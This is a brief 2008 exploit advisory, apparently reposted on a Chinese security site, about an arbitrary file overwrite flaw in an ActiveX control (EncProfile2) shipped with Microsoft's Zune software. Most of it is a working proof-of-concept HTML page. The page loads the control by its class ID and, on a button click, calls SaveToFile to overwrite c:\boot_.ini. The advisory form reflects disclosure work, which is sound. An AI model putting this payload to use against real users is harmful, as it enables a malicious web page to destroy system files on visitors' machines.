Zune Software ActiveX Arbitrary File Overwrite Exploit
|
来源:ilion Research Labs 作者:Mariani 发布时间:2008-04-24
|
|
Vulnerability class : Arbitrary file overwrite Discovery date : 21 April 2008 Remote : Yes Credits : J. Bachmann & B. Mariani from ilion Research Labs Vulnerable : Zune software: EncProfile2 Class
An arbitrary file overwrite as been discovered in an ActiveX control installed with the Zune software package. If a user visits the malicious page and authorize the control to run (it is not marked safe for scripting), the attacker can erase an arbitrary file.
POC: <HTML> <BODY> <object id=ctrl classid="clsid:{0B1C3B47-207F-4CEA-8F31-34E4DB2F6EFD}"></object> <SCRIPT> function Do_it() { File = "c:\\boot_.ini" ctrl.SaveToFile(File) } </SCRIPT> <input language=JavaScript onclick=Do_it() type=button value="Proof of Concept"> </BODY> </HTML>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|